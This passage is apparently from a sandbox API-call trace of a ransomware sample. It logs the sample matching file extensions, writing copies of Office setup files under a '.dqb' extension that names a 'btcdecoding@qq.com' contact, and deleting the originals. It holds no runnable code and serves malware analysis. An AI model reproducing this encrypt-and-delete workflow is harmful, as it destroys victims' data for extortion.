(lpString1=".doc", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".docx") returned 5 [0036.756] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.756] lstrlenW (lpString=".pdf") returned 4 [0036.756] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".xls") returned 4 [0036.756] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".xlsx") returned 5 [0036.756] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.756] lstrlenW (lpString=".ppt") returned 4 [0036.757] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.757] lstrlenW (lpString=".zip") returned 4 [0036.757] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.757] lstrlenW (lpString=".rar") returned 4 [0036.757] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.757] lstrlenW (lpString=".bz2") returned 4 [0036.757] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.757] lstrlenW (lpString=".7z") returned 3 [0036.757] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.757] lstrlenW (lpString=".dbf") returned 4 [0036.757] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.757] lstrlenW (lpString=".1cd") returned 4 [0036.757] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.757] lstrlenW (lpString=".jpg") returned 4 [0036.757] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.757] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.757] lstrlenW (lpString="delete.avi") returned 10 [0036.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0037.115] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=224256) returned 1 [0037.115] CloseHandle (hObject=0x19c) returned 1 [0037.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0037.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.115] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.115] lstrlenW (lpString=".doc") returned 4 [0037.115] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString=".docx") returned 5 [0037.115] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0037.115] lstrlenW (lpString=".pdf") returned 4 [0037.115] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString=".xls") returned 4 [0037.115] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString=".xlsx") returned 5 [0037.115] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0037.115] lstrlenW (lpString=".ppt") returned 4 [0037.115] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.115] lstrlenW (lpString=".zip") returned 4 [0037.115] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString=".rar") returned 4 [0037.115] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.115] lstrlenW (lpString=".bz2") returned 4 [0037.116] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".7z") returned 3 [0037.116] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString=".dbf") returned 4 [0037.116] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString=".1cd") returned 4 [0037.116] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString=".jpg") returned 4 [0037.116] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString=".doc") returned 4 [0037.116] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".docx") returned 5 [0037.116] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0037.116] lstrlenW (lpString=".pdf") returned 4 [0037.116] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".xls") returned 4 [0037.116] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".xlsx") returned 5 [0037.116] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0037.116] lstrlenW (lpString=".ppt") returned 4 [0037.116] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.116] lstrlenW (lpString=".zip") returned 4 [0037.116] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".rar") returned 4 [0037.116] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".bz2") returned 4 [0037.116] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.116] lstrlenW (lpString=".7z") returned 3 [0037.116] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.117] lstrlenW (lpString=".dbf") returned 4 [0037.117] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.117] lstrlenW (lpString=".1cd") returned 4 [0037.117] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0037.117] lstrlenW (lpString=".jpg") returned 4 [0037.117] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.117] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.117] lstrlenW (lpString="ipsita.xml") returned 10 [0037.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.228] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2526) returned 1 [0037.228] CloseHandle (hObject=0x1c0) returned 1 [0037.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0x20 [0037.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.228] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.228] lstrlenW (lpString=".doc") returned 4 [0037.228] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.228] lstrlenW (lpString=".docx") returned 5 [0037.228] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0037.228] lstrlenW (lpString=".pdf") returned 4 [0037.228] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.228] lstrlenW (lpString=".xls") returned 4 [0037.228] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.228] lstrlenW (lpString=".xlsx") returned 5 [0037.228] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0037.228] lstrlenW (lpString=".ppt") returned 4 [0037.228] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.228] lstrlenW (lpString=".zip") returned 4 [0037.229] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.229] lstrlenW (lpString=".rar") returned 4 [0037.229] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.229] lstrlenW (lpString=".bz2") returned 4 [0037.229] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.229] lstrlenW (lpString=".7z") returned 3 [0037.229] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.229] lstrlenW (lpString=".dbf") returned 4 [0037.229] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.229] lstrlenW (lpString=".1cd") returned 4 [0037.229] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString=".jpg") returned 4 [0037.230] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString=".doc") returned 4 [0037.230] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString=".docx") returned 5 [0037.230] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0037.230] lstrlenW (lpString=".pdf") returned 4 [0037.230] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString=".xls") returned 4 [0037.230] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString=".xlsx") returned 5 [0037.230] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0037.230] lstrlenW (lpString=".ppt") returned 4 [0037.230] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString=".zip") returned 4 [0037.230] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.230] lstrlenW (lpString=".rar") returned 4 [0037.230] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString=".bz2") returned 4 [0037.230] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString=".7z") returned 3 [0037.230] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString=".dbf") returned 4 [0037.230] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.230] lstrlenW (lpString=".1cd") returned 4 [0037.230] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 61 [0037.231] lstrlenW (lpString=".jpg") returned 4 [0037.231] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.231] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.231] lstrlenW (lpString="AccessMUISet.XML") returned 16 [0037.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.240] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=819) returned 1 [0037.240] CloseHandle (hObject=0x1bc) returned 1 [0037.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20 [0037.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.240] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.240] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0037.240] GetLastError () returned 0x0 [0037.240] ReadFile (in: hFile=0x1bc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x333, lpOverlapped=0x0) returned 1 [0037.248] WriteFile (in: hFile=0x1c8, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x340, lpOverlapped=0x0) returned 1 [0037.249] ReadFile (in: hFile=0x1bc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.249] WriteFile (in: hFile=0x1c8, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0037.250] SetEndOfFile (hFile=0x1c8) returned 1 [0037.250] CloseHandle (hObject=0x1c8) returned 1 [0037.250] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.250] SetEndOfFile (hFile=0x1bc) returned 1 [0037.251] CloseHandle (hObject=0x1bc) returned 1 [0037.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.251] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0037.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.251] lstrlenW (lpString=".doc") returned 4 [0037.252] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".docx") returned 5 [0037.252] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.252] lstrlenW (lpString=".pdf") returned 4 [0037.252] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".xls") returned 4 [0037.252] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".xlsx") returned 5 [0037.252] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.252] lstrlenW (lpString=".ppt") returned 4 [0037.252] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString=".zip") returned 4 [0037.252] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.252] lstrlenW (lpString=".rar") returned 4 [0037.252] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".bz2") returned 4 [0037.252] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".7z") returned 3 [0037.252] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString=".dbf") returned 4 [0037.252] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString=".1cd") returned 4 [0037.252] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString=".jpg") returned 4 [0037.252] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.252] lstrlenW (lpString=".doc") returned 4 [0037.252] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.252] lstrlenW (lpString=".docx") returned 5 [0037.253] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.253] lstrlenW (lpString=".pdf") returned 4 [0037.253] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString=".xls") returned 4 [0037.253] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString=".xlsx") returned 5 [0037.253] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.253] lstrlenW (lpString=".ppt") returned 4 [0037.253] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.253] lstrlenW (lpString=".zip") returned 4 [0037.253] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.253] lstrlenW (lpString=".rar") returned 4 [0037.253] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString=".bz2") returned 4 [0037.253] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString=".7z") returned 3 [0037.253] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.253] lstrlenW (lpString=".dbf") returned 4 [0037.253] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.253] lstrlenW (lpString=".1cd") returned 4 [0037.253] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.253] lstrlenW (lpString=".jpg") returned 4 [0037.253] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.439] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.439] lstrlenW (lpString="InfoPathMUI.XML") returned 15 [0037.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.439] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1231) returned 1 [0037.439] CloseHandle (hObject=0x1a4) returned 1 [0037.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20 [0037.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.439] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.439] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.449] GetLastError () returned 0x0 [0037.449] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0037.498] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0037.498] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.498] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0037.499] SetEndOfFile (hFile=0x1bc) returned 1 [0037.499] CloseHandle (hObject=0x1bc) returned 1 [0037.499] SetFilePointerEx (in: 